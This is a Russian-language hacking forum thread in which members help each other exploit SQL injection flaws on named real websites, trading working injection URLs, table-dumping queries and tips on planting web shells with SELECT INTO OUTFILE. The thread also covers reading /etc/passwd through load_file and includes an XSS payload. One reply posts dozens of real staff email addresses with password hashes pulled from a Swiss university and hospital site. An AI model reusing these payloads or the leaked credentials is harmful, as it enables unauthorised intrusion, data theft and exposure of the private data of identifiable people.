Да, именно. Пока что, исходя из тех данных, к которым я имею доступ, хочу попытаться в первую очередь попробовать залить шелл. Вот я и пытаюсь узнать свои права. Но не знаю как определить в information_schema свои права при условии отсутствия поля "FILE" в таблице USER_PRIVILEGES.

Konqi said:
если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.
в information_schema не хранится информация о правах, так что не ищи дальше.


Ясно, понял. Учту на будущее. Спасибо. И, безусловно, жаль, что дело принимает такой оборот. Ладно, попробуем поискать обходные пути.

Konqi said:
если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.


Не совсем верное утверждение, бывают случаи когда доступ к базе mysql действительно запрещен но файловые привилегии тем не менее есть.

Самый верный способ узнать о наличии привилегий прочитать содержимого произвольного файла функцией load_file

Nightmarе said:
Как часто такое бывает? По своему опыту назови примерный процент, интересная вещь, но стоит ли заморачиваться лишний раз с load_file


Не выводил в статистику. База Mysql это последнее дело куда я смотрю (потому что phpmyadmin не частый гость, а порт mysql чаще либо закрыт, либо лежит где-то глубоко в сети), первым делом чекаю всю лафу load_file (кстати не вижу проблем в этой фразе "стоит ли заморачиваться лишний раз с load_file", что там замарачиваться? выполнить одну команду load_file('/etc/passwd') и ежи с ним?), magic_qoutes, и пользовательские таблицы с целью поиска паролей администраторов.

Hi friend please help me to get the datas from

column: password

table: unimitarbeiter and

DB: koopdb

vul link: http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935

injection is double query . .

d4rkn3ss said:
Hi friend please help me to get the datas from
column: password
table: unimitarbeiter and
DB: koopdb
vul link: http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935
injection is double query . .


запрос


http://www.int.uzh.ch/static/single/berichteonline/bericht.php?l=de&ri=IN&id=6935+or+1+group+by+concat%28%28select+concat_ws %280x3a,username,passwort%29+from+koopdb.users+lim it+0,1%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+


результат


4.in@access.unizh.ch:f275af23c820a6339bb71aba01888 419
cgrimm@opht.unizh.ch:50125e392c292336861cba76e6fd9 45e
krystyna.siewczyk@usz.ch:cb7f36c9fd5a637ded33690f4 30e6d1c
karin.buehler@usz.ch:f5ddcab582942eb7c47e0aec63e02 3ef
c.koenig@psychologie.unizh.ch:7c6a180b36896a0a8c02 787eeafb0e4c
christine.voegtli@usz.ch:54da2d421fa1171848b6ff6fa 4bda5f0
georgina.mathis@usz.ch:0cc99d89064875ac50e317899ce 9cf4f
ursula.ludgate@usz.ch:bd8912c78ab80dc88f4c342592de 36fb
dave@ini.uzh.ch:9bff5a12ae4a501ae69018c7102c630c
diverses@peripteros.ch:f275af23c820a6339bb71aba018 88419
gabriela.brun@usz.ch:9835260c7cabe24ce31b19d327596 951
vollen@bli.uzh.ch:7e5ed010dd534b328495a5946297131d
Tristan.Weddigen@khist.uzh.ch
rolf.graf@usz.ch
madeleine.meyer@usz.ch
neuroradiologie@usz.ch:82afb9b2aff7ad5ef13e772b43b ba24f
buh@usz.ch:10eb9541ec80f146eeef0cc33a107a55
jcf@fhk.usz.ch
christine.genne@usz.ch
boeker@geo.unizh.ch
cgrimm@opht.uzh.ch:50125e392c292336861cba76e6fd945 e
curdin.conrad@usz.ch
thomas.kuendig@usz.ch:3a64e72ff183fa4f72bee32f7f67 0715
barbara.ballmer@usz.ch:8d4dffe2d67fe9fae881beb9450 8e564
peter.schmid@usz.ch
fred.buck@usz.ch:73815008e92bd1dabec64d78f8e1e7c4
damina.balmer@usz.ch:804f3cfb6443223aff6c9beafc147 f16
monique.dupuis@demed.uzh.ch
hans-dietmar.beer@usz.ch:2ee5361be26884fdfa124cccc8325a fc
michael.rufer@usz.ch:530ea1472e71035353d32d341ecf6 343
chantal.martinsoelch@usz.ch
stephan.heller@iou.unizh.ch:d5256c0fdd004a33dca56a 5da5c9ae7e
emmanuel.contassot@usz.ch:1591f96cb1a9e340096f3d1c cd8ad624
thorsten.hornemann@usz.ch:cd136e10a5fe23c2dc75d968 b528802f
danielle.hof@usz.ch:e2ea3e4af5da8abbe3ada277c6c515 21
lucia.rohrer@usz.ch
erasmus@int.uzh.ch
Doris.Varga@usz.ch :d785c99d298a4e9e6e13fe99e602ef42
arnold.vonechardstein@usz.ch
arnold.voneckardstein@usz.ch:f8ebbd7c79415208cd27c 710a2327183
m.hundt@es.uzh.ch
onur.boyman@usz.ch:dd8062ba81f193e55d388e710c3b48d 3
olga.rix@access.uzh.ch
d.rippmann@access.uzh.ch
secgruetter@bioc.uzh.ch:b0c57c22e283decb72cb882847 0f2ceb
lanja.saleh@usz.ch
lutz.wittmann@usz.ch:508e5eb303b693da58b52db10dad6 5fa
ralph.braun@usz.ch
Cecilia.Greber@usz.ch:f4742802743341c3f2ce66845586 8947
cozzio@usz.ch:ef9765fae379511732050ceede94c0e2
karin.klein@usz.ch:f5ddcab582942eb7c47e0aec63e023e f
sonja.bernhard@usz.ch:fece5e5b90990ebe62524b4f8c9f 6ba4
juerg.hafner@usz.ch
thomas.harr@usz.ch
silva.stutz@usz.ch:f3f646d7184dd50dca0553431e0fc61 1

Как в таком запросе провести иньекцию?


SQL: SELECT * FROM `fishingc_db`.`modx_site_ec_banners` WHERE active = 1 AND (showcount <> showncount) AND (itemids LIKE '%"90'"%' OR pageids LIKE '%|219|%')


через контактацию с ошибкой не получается

http://www.fishingchel.ru/vodoemi/219?id=90%27

Code:
http://www.fishingchel.ru/vodoemi/219?id=90')+or+1+group+by+concat(version(),floor(r and(0)*2))+having+min(0)+or+1+--+

Duplicate entry '4.1.22-lk-log1' for key 1

faza02 said:

Code:
http://www.fishingchel.ru/vodoemi/219?id=90')+or+1+group+by+concat(version(),floor(r and(0)*2))+having+min(0)+or+1+--+

Duplicate entry '4.1.22-lk-log1' for key 1


спс

а вот тут


PHP:
http://kudapostupat.by/speciality/id/90%27%29+or+1+group+by+concat%28table_name+from+in formation_schema.tables,floor%28rand%280%29*2%29%2 9+having+min%280%29+or+1+--+



чё ет за ошибка? как обходится?


SQLSTATE[HY000] [2002] Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)

qaz said:
спс
а вот тут

PHP:
http://kudapostupat.by/speciality/id/90%27%29+or+1+group+by+concat%28table_name+from+in formation_schema.tables,floor%28rand%280%29*2%29%2 9+having+min%280%29+or+1+--+



чё ет за ошибка? как обходится?


http://kudapostupat.by/speciality/id/-90%27%29+UNION+SELECT+1,2,3,table_name,5,6,7,8,9,1 0,11,12+from+information_schema.tables%23

=\

А чё ето за байду мне выдаёт?


Fatal error: Allowed memory size of 201326592 bytes exhausted (tried to allocate 3440 bytes) in /home/kudapost/public_html/library/Zend/Db/Statement/Pdo.php on line 290




http://kudapostupat.by/speciality/id/-90%27%29+limit+0,0+UNION+SELECT+1,2,3,user_email,5 ,6,7,8,9,10,11,12+from+kp_users--+


как базу выкачать?

qaz said:
как базу выкачать?


памяти не хватает для этого запроса. юзай лимит.

http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11 ,12+from+kp_users+limit+1350--+

http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,user_email,5,6,7,8,9,10,11 ,12+from+kp_users+limit+1350,1482--+

т.к.

http://kudapostupat.by/speciality/id/-90')+UNION+SELECT+1,2,3,count(user_email),5,6,7,8, 9,10,11,12+from+kp_users--+

а запрос прерывается ~ в показанном мной промежутке.

Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(

Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11

в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1

То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?

nikaw87 said:
Возникла проблема со скулью... Пошерстил форум, вроде ничего не нашел(
Вообщем: есть скуль http://xxx.xx/xxx.php?num=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
в интересующей базе названия столбцов id,1,2,3... при таком запросе http://xxx.xx/xxx.php?num=-1+UNION+SELECT+group_concat(id,0x3A,2,0x3A,1+SEPAR ATOR+0x0b),2,3,4,5,6,7,8,9,10,11+FROM+xxx.bank возвращает строки вида (ид):2:1
То есть ид вытаскивает корректно, а остальные поля выводит числами указанными... как по другому обратиться к этим столбцам?


Указать имя поля вместо id?

Зы. а вообще нихрена не понял...

я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки

This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.


Code:
task=category&sectionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54

To get the error I used HackBar for Firefox, I put in this first:


Code:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html

Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):

Code:

Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344

How to inject next ???

nikaw87 said:
я не могу вытащить значения колонок 1 2 3... при обращении к ним, возвращает число-имя колонки


Если mq=off, то юзай `1` и т.п.

Melfis said:
Если mq=off, то юзай `1` и т.п.


во, другое дело) спасибо =)

d4rkn3ss said:
This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.

Code:
task=category&sectionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54

To get the error I used HackBar for Firefox, I put in this first:

Code:
http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html

Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):
Code:
Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344
How to inject next ???


Это русскоязычный форум. Пишите по-русски.

тут что-нибудь можно вытянуть?

_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./

er9j6@ said:
тут что-нибудь можно вытянуть?
_http://weddings-kl.sunwayhotels.com/guest/guest.asp?type=./


нет.

зы: а что ты хотел показать точкой со слешем?)

d1v said:
нет.
зы: а что ты хотел показать точкой со слешем?)


что это похоже инклуд

er9j6@ said:
что это похоже инклуд


чем похоже?

Немогу скулю разкрутить, хелп


http://hostdb.ru/index/menu/id/2'

qaz said:
Немогу скулю разкрутить, хелп


тут пробуй


http://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(select(name_const(versio n(),1)),name_const(version(),1))a)and'

er9j6@ said:
тут пробуй


так просто пишут Вы неправильно ввели Email или пароль.

qaz said:
так просто пишут Вы неправильно ввели Email или пароль.


SELECT * FROM menu_items WHERE link = '1'and(select*from(select(name_const(version(),1)) ,name_const(version(),1))a)and''. Duplicate column name '5.5.8'

er9j6@ said:
SELECT * FROM menu_items WHERE link = '1'and(select*from(select(name_const(version(),1)) ,name_const(version(),1))a)and''. Duplicate column name '5.5.8'


чёт я не вдуплю куда етот запрос впихнуть

qaz said:
чёт я не вдуплю куда етот запрос впихнуть


Тогда читай мануалы

qaz said:
чёт я не вдуплю куда етот запрос впихнуть



вместо version() свой запрос

lalala from table

вопрос таков:

если я имею рутовский доступ к БД, что я теоретически смогу сделать?

Вплане заливки шелла, правки индекса...

Например, через тулзу MySQL query browser

вместо version() свой запрос
lalala from table


А как вывести только одну колонку ? Пытаюсь вот таким запросомhttp://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(information_schema.table s))and' Но в ответ пишет:


SELECT * FROM menu_items WHERE link = '1'and(select*from(information_schema.tables))and' '. Operand should contain 1 column(s)

stan0009 said:
вопрос таков:
если я имею рутовский доступ к БД, что я теоретически смогу сделать?
Вплане заливки шелла, правки индекса...
Например, через тулзу MySQL query browser


полный доступ к базе MySQL, создание/уничтожение

и читать/писать файлы (если есть достаточно прав у пользователя MySQL в системе)

stan0009 said:
вопрос таков:
если я имею рутовский доступ к БД, что я теоретически смогу сделать?
Вплане заливки шелла, правки индекса...
Например, через тулзу MySQL query browser


если разрешён коннект с удалённых ip для пользователя, то ты сможешь с неё подконнектится, иначе нет


bodrich said:
А как вывести только одну колонку ? Пытаюсь вот таким запросом
http://hostdb.ru/auth/login?myPassword=WCRTESTINPUT000001&type=1&myLogin=1'and(select*from(information_schema.table s))and'
Но в ответ пишет:


Подзапрос может возвращать только одно значение, тобишь нельзя использовать *, там же написано. Если надо вернуть несколько колонок сразу, то надо сначала их объединить оператором типа concat_ws(0x3a,column_1,column_2,...,column_n), где 0x3a = : в hex формате. А ещё предвижу ошибку subquery returned more than one row(ну или как-то так), это потому что надо использовать лимит в подзапросе.

Melfis

ессесно я к ней и подключаюсь и все что хочешь могу делать.

перефразирую:

какие мне команды отправлять БД чтобы загрузить файл и вообще возможно ли это?

stan0009 said:
Melfis
ессесно я к ней и подключаюсь и все что хочешь могу делать.
перефразирую:
какие мне команды отправлять БД чтобы загрузить файл и вообще возможно ли это?


при наличии file_priv =Y

SELECT '' INTO OUTFILE '/dir/name/shell.php'

why i can not see vul columns no??


Code:
http://www.myhomestory.com/interior-doors-gallery.php?id=-1%20UnioN%20selEct%20all%200,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1--

becouse id=1+and+1=0

http://www.myhomestory.com/interior-doors-gallery.php?id=1+and+1=0%20UnioN%20selEct%20all%20 0,version%28%29,2,3,4,5,6,7,8,9,0,1%20,2,3,4,5,6,7 ,8,9,0,1--

this is forum Russian,translate write... уже наконец то

эх жаль. Но как ты его нашел??

d4rkn3ss said:
эх жаль. Но как ты его нашел??


чего нашел?, просто создал не верную логику

или же так http://www.myhomestory.com/interior-doors-gallery.php?id=111111111111111111111%20UnioN%20sel Ect%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20 ,2,3,4,5,6,7,8,9,0,1--

d4rkn3ss said:
эх жаль. Но как ты его нашел??


Ты меня порвал Ты должен сделать так, чтобы инфа с БД не вывелась(1=0, 999999.9).

HAXTA4OK said:
чего нашел?, просто создал не верную логику
или же так http://www.myhomestory.com/interior-doors-gallery.php?id=111111111111111111111%20UnioN%20sel Ect%20all%200,version%28%29,2,3,4,5,6,7,8,9,0,1%20 ,2,3,4,5,6,7,8,9,0,1--


Хорошо. . я получил его. . спасибо!

Это параметр для SQL инъекций, это может быть POST SQL инъекции, я не совсем уверен.

Код:

Чтобы получить сообщение об ошибке я HackBar для Firefox, я ставлю в этой первой:

Код:

http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html

Тогда я нажал на "Включить сообщения данных и поместить в параметр и я нажал на" Выполнить "и он дал мне следующее сообщение об ошибке (ы): Код: Warning: Неверный аргумент для Еогеасп поставки () в / home/yaziyaz2/public_html / Evrim / компоненты / com_content / модели / category.php на линии 337 Предупреждение: mysql_num_rows (): поставляется аргумент не является допустимым результатом MySQL ресурса / home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql. PHP в строке 344 как вводить дальше??

This is the parameter for the SQL injection , it could be POST SQL injection, I'm not entirely sure.


Code:
task=category&sectionid=10&filter_order=on&filter=%BF%27%22%28&limitstart=0&filter_order_Dir=on&limit=on&id=54

To get the error I used HackBar for Firefox, I put in this first:

Code:

http://www.yaziyaz.net/Evrim/konular/54-inorganik-evrim.html

Then I clicked on 'Enable Post data' and put in the parameter and I clicked on 'Execute' and it gave me the following error(s):

Code:

Warning: Invalid argument supplied for foreach() in /home/yaziyaz2/public_html/Evrim/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/yaziyaz2/public_html/Evrim/libraries/joomla/database/database/mysql.php on line 344

Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются

Сам код(пишу недавно за безграмотность не судить):

Qwert321 said:
Ребят подскажите как оптимизировать код. Этот код просто записывает лог посещений, но все страницы куда я его добавляю явно медленнее загружаются
Сам код(пишу недавно за безграмотность не судить):



Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.

R0nin said:
Ты предлагаешь его еще дешифровать? Если приведешь код в нормальное, понятное состояние могу постараться помочь тебе.


сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё

Qwert321 said:
сорри исправил... просто пока пробовал вставиьть как пхп код тупо вышло ...ну вообщем ща норм всё


Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня:


Каждый раз подключаться к DB, потом отключаться, и так покругу - глупо. Один раз подключись, построй свою систему, где будешь передавать уже действующий идентификатор подключения. Это намного ускорить твой код.

Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).

Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.

Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.

R0nin said:
Уже вижу. Так тебе нужна была подсказка, вот подсказка от меня:

Зачем столько раз вызывать urlencode()? Для чего ты его вообще вызываешь? Найди альтернативу. Все функция работающие со строками медленные, но некоторые медленее чем другие. Поэтому, найди оптимальный вариант для своего случая. Функций для работы со строками дофига (особенно в PHP).

Разделяй код на функции. Зачем все в один файл толкать. Понимаю что это может чуть замедлить код, но в дальнейшем намного легче будеть исправлять ошибки, расширять функционал скрипта и т.д.



urlencode от sql inj

Какие тут функции то делать код три строчки

R0nin said:
Кстати, я вообще не догнал, зачем ты этот вопрос написал в теме про уязвимостей? Тут же есть тема про PHP, пиши там.


действительно... сори модеров прошшу удалить сообщения... пойду искать другую ветку

Qwert321 said:
urlencode от sql inj
Какие тут функции то делать код три строчки


От SQL-inj используются другие функция. urlencode переведет все специальные знаки, а это не обязательно, чтобы защититься от SQL-inj.

а такой вопрос

чего тут емеил выводится нормально,


http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+table_schema+from+information_schema.t ables+where+table_name=0x53435f637573746f6d657273% 29,0x00,floor%28rand%280%29*2%29%29having+min%280% 29+or+1--+


а логин и пароль невыводятся вобще


http://www.play-today.ru/index.php?productID=39119%27+or+1+group+by+concat% 28%28select+Login+from+play_today.SC_customers+lim it+0,1%29,0x00,floor%28rand%280%29*2%29%29having+m in%280%29+or+1--+


как их вывести?

как тут выывести таблицы ?

http://www.passion.ru/piknik.php/view/%282%29union%28select%281%29,version%28%29,3%29

Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+15,1

Как залить шелл?

помогите раскрутить,вроде всё правильно делаю


Code:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f

Faaax said:
помогите раскрутить,вроде всё правильно делаю

Code:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f





Code:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30%22%3E%3Cscript%3Ealert('hack')%3C/script%3E

а при чём тут xss?

xcedz said:
ищи админа и пас, админку. через sql не ливанешь, прав нет.
http://www.bing.com/search?q=ip:91.218.229.20


Как узнал какие права? Какие нужны мне для этого? Как найти админку? Как найти таблицу где данные о логине и пассе админа?

Faaax said:
а при чём тут xss?


А XSS разве не уязвимость? надо уточнять в чем именно помощь то нужна)

foma9999 said:
Как узнал какие права? Какие нужны мне для этого? Как найти админку? Как найти таблицу где данные о логине и пассе админа?


1)


Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+whe re+user=user()

Ошибка, значит нет прав.

2) Все таблицы:


Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect( @x:=0x00),(%73elect(null)%66rom(%69nformation_sche ma.%63olumns)%77here(%74able_schema!=0x696e666f726 d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63o ncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x 3a,%63olumn_name))))x)

Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.

Вот цель например:


Code:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon

Ereee said:
1)

Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+whe re+user=user()

Ошибка, значит нет прав.
2) Все таблицы:

Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect( @x:=0x00),(%73elect(null)%66rom(%69nformation_sche ma.%63olumns)%77here(%74able_schema!=0x696e666f726 d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63o ncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x 3a,%63olumn_name))))x)

Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.
Вот цель например:

Code:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon



Ничего не понятно блин!

Как запросы такие составлены?


Code:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect( @x:=0x00),(%73elect(null)%66rom(%69nformation_sche ma.%63olumns)%77here(%74able_schema!=0x696e666f726 d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63o ncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x 3a,%63olumn_name))))x)

Как были найдены ссылки


Code:
http://www.robolive.ru/cms/ http://www.robolive.ru/gb/admin/index.php?in_action=logon

?

man ну ты вообще

читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом

Faaax said:
man ну ты вообще
читай тут на ачате статьи по sql injection,админка находится либо от того какая cms либо простым брутом



Ок, еще бы про составление запроса проконсультировали бы

Faaax said:
помогите раскрутить,вроде всё правильно делаю

Code:
http://www.auto-most.ru/site/video/testdrive/ford/905.html?next=30', 30 union select version()--+f



Если очень постараться, то можно раскрутить

5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2

так что дерзай

er9j6@ said:
Если очень постараться, то можно раскрутить
5.2.4-MariaDB:automost:automost_automos@localhost: portbld-freebsd8.2
так что дерзай


И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?

столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:


Code:
HTTP/1.1 500 Internal Server Error
Date: Sat, 10 Mar 2012 09:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9201


Conversione non riuscita durante la conversione del valore nvarchar 'u:baudo@apre.it' nel tipo di dati int.


но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?

Можно ли залить шелл на InstantCMS v1.9 ?

durito said:
столкнулся с таким впервые, стандартная скуль в mssql вывод через сообщение об ошибке:
но вот трабла, ни один из дамперов не видит ответа. даже самописные, которые никогда не подводили. в чем может быть проблема?


HTTP/1.1 500 Internal Server Error

Дамперы думают, что ошибка в запросе и не дампить. А самописные дампить должны. Посмотри, нет ли перенаправлений.

Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,COLUMN_NAME,3/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=%27wp_users%27/**/LIMIT/**/2,1--

Так выводит, а так нет...


Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1/**/UnIon/**/selECt/**/1,UNHEX%28HEX%28user_login%29%29,3/**/FROM/**/wp_users%27/**/LIMIT/**/0,1--

Как вывести?

P.S: использовать функции ASCII() и CHAR?

выручайте!

есть рут доступ к phpmyadmin.

мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:

когда я пишу код


Code:
SELECT '' INTO OUTFILE '/dir/name/shell.php'

где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.

решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/

туда все спокойно льется, только понять где находится заветный php файл мне не удается.

Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю

aydin-ka,

в другой базе твоя таблица.

Узнаем вот так:


Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT+table_schema+from+i nformation_schema.tables+where+table_name='wp_user s'),3--+

Теперь выводит логин:


Code:
http://www.smokycarrot.com/index.php?rubID=%2715&lan=%27en&artID=1+union+select+1,(SELECT user_login from smokycarrotcom1.wp_users limit 0,1),3--+f

stan0009,

Из /var/lib/mysql/ не сможешь выполнять скрипты. Ищи папки, типа /uplaods/, /images/, /tmp/ и т.д. и т.п. Там обычно CHMOD 755 or 777.

Ereee

меня вот что удивляет что захожу из под root а пишет что нет доступа(

в чем прикол понятия не имею.

Всмысле которые в корне(/tmp/) или которые например в /home/site/dir/tmp/ ?

stan0009 said:
Ereee
меня вот что удивляет что захожу из под root а пишет что нет доступа(
в чем прикол понятия не имею.
Всмысле которые в корне(/tmp/) или которые например в /home/site/dir/tmp/ ?


В /home/site/dir/tmp/. У тебя рут-доступ на MYSQL-сервере, полный доступ над целевой системой у тебя нет.

KolosJey said:
И в подтверждение своих слов ты наверное сейчас всех удивишь и покажешь вектор атаки именно НА ЭТОМ МЕСТЕ, да?


В другом месте

_http://forum.auto-most.ru/faq.php?bb=phpinfo();

alexvrn said:
Можно ли залить шелл на InstantCMS v1.9 ?


/threadnav189469-1-10-instant%2Bcms.html

Правда там до версии 1.6.2

Ereee

спасибо конечно, но походу все перекрыто(

есть может еще какие способы?

версия админки 2.9.1.1

stan0009 said:
Ereee
спасибо конечно, но походу все перекрыто(
есть может еще какие способы?
версия админки 2.9.1.1


Бывает, но такие случаи занесены в Красную книгу. Поищи еще папок...

stan0009 said:
выручайте!
есть рут доступ к phpmyadmin.
мне уже один товарищ помог с залитием шелла, спасибо ему за это, но вопрос такой:
когда я пишу код

Code:
SELECT '' INTO OUTFILE '/dir/name/shell.php'

где указываю установочный путь, который я узнал из инъекции. и потом мне выдает что я не имею права записи в эту папку. вообще никуда. хотя нужно заметить что доступ рут.
решил пойти в обход, дал команду SELECT @@datadir которая мне выдала свободную папку /var/lib/mysql/
туда все спокойно льется, только понять где находится заветный php файл мне не удается.
Прошу помочь вас разобраться с первым вопросом или со вторым. Мб я что-то не так делаю


Если у тебя русскоязычный сайт и File_priv = Y, то проверь на всякий случай главную страницу на код сапы.


PHP:
load_file('полный_путь/index.html')

Если повезет, то у тебя будет папка с правами 777.

(Спасибо faza02 за этот интересный выход из положения, когда казалось, что нет папок для заливки шелла )

^

||

Error in syntax

видимо дело дрянь

а стоп.

команда то наверно не такая

я то пишу команду load_file прямым текстом а как надо?

Не очень то вы активные)

пишите в личку чтоле, чтобы много мне не писать)

как быть?

пишу select load_file('/etc/passwd'); отображается BLOB и размер файла.

других способов не знаю

er9j6@ said:
В другом месте
_http://forum.auto-most.ru/faq.php?bb=phpinfo();


заюзал споинт и ты крут,молодчик,иди домой пасси гусей

спрашиволось а расскрутке,а не через другой способ лол

подкиньте название какой-нибудь проги для дампа mysql таблицы через schema,SIPT 4 не смог,хотя ручками все ок

в общем есть таблицы, havij их вроде хавает при get, но не выдает в левой колонке - а там все нужное. как открыть скрытое? uname есть ид есть, мейл есть, pass скрыта)

спасибо.

Найдена скуля в выводе картинки.

Т.е. showimage.php?id=...

И id не проверяется никак.

Но проблема в том, что там заголовок отдаётся image/jpeg - т.е. получается каша. Никак не пойму, как это привести в читабельный вид?

сылку кинь в ЛС посмотрю,так как нужно на сам сайт смотреть,а то тут экстрасенсов нету)))

Данная таблица sql

http://i065.radikal.ru/1203/0d/f51b27178959.jpg

В данной таблице мне надо изменить


PHP:
'apache'@'localhost'

на


PHP:
'apache'@'127.0.0.1'


Собственно как это сделать через запрос ???

Дайте пример.

UPDATE USER_Pr SET GRANTEE = 'apache'@'127.0.0.1' WHERE GRANTEE = 'apache'@'localhost'

Пишет


PHP:
Error:You have an error in your SQL syntax;

check the manual that corresponds to your M ySQL

server versionforthe right syntax tousenear' @'127.0.0.1' WHERE GRANTEE = 'apache'@'localho st''at line 1

Groove said:
Пишет

PHP:
Error:You have an error in your SQL syntax;

check the manual that corresponds to your M ySQL

server versionforthe right syntax tousenear' @'127.0.0.1' WHERE GRANTEE = 'apache'@'localho st''at line 1



Кавычки экранируй, я уже не помню но вроде слешами.

попробуй за место

UPDATE USER_Pr SET GRANTEE = 'apache'@'127.0.0.1' WHERE GRANTEE = 'apache'@'localhost'

так

UPDATE USER_PRIVILEGES SET GRANTEE = 'apache'@'127.0.0.1' WHERE GRANTEE = 'apache'@'localhost'

Faaax said:
попробуй за место
